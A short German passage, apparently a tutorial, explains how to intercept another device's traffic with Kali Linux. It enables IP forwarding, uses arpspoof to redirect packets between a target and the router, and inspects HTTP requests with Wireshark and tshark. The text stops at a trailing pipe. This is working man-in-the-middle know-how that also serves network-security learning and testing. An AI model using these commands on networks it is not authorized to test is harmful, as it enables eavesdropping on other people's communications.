Kali-Linux herunterladen und eine startbare DVD erstellen. Im Terminal echo 1 > /proc/sys/net/ipv4/ip_forward eingeben. Mit arpspoof -i eth0 -r -t [IP-Addresse vom Gerät] [IP-Adresse vom Router] die Pakete umlenken und mit Wireshark beobachten (Programm-Menü/Kali Linux/Top 10 Security Tools).
Zum Programm Wireshark gehört das Kommandozeilenwerkzeug tshark. Folgendes Beispiel nutzt einen Display-Filter, um die Pakete anzuzeigen, die per HTTP für eine URL mit „abcdef“ übertragen werden.
tshark -i eth0 -R "http.request.uri contains abcdef" |